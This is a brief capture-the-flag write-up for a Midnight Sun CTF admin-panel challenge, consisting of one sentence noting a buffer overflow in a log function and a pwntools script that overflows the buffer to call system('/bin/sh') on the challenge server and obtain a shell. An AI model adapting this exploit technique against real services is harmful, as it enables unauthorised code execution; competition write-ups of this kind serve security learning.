Rating: 5.0

There is a buffer overflow in the log function.
```python
from pwn import *

s = remote("admpanel2-01.play.midnightsunctf.se", 31337)

system = 0x000000000401598
username_addr = 0x000000000040159B

s.sendline("1")
s.sendline("admin")
s.sendline("password")
s.sendline("1")
s.sendline("/bin/sh" + " " * 1024 )
s.sendline("2")
s.sendline("A" * cyclic_find("raac") + p64(system) + p64(username_addr))
s.interactive()
```

Original writeup (https://gist.github.com/zommiommy/e67bcc6f738b6148b3bdfc3525c0d4ec).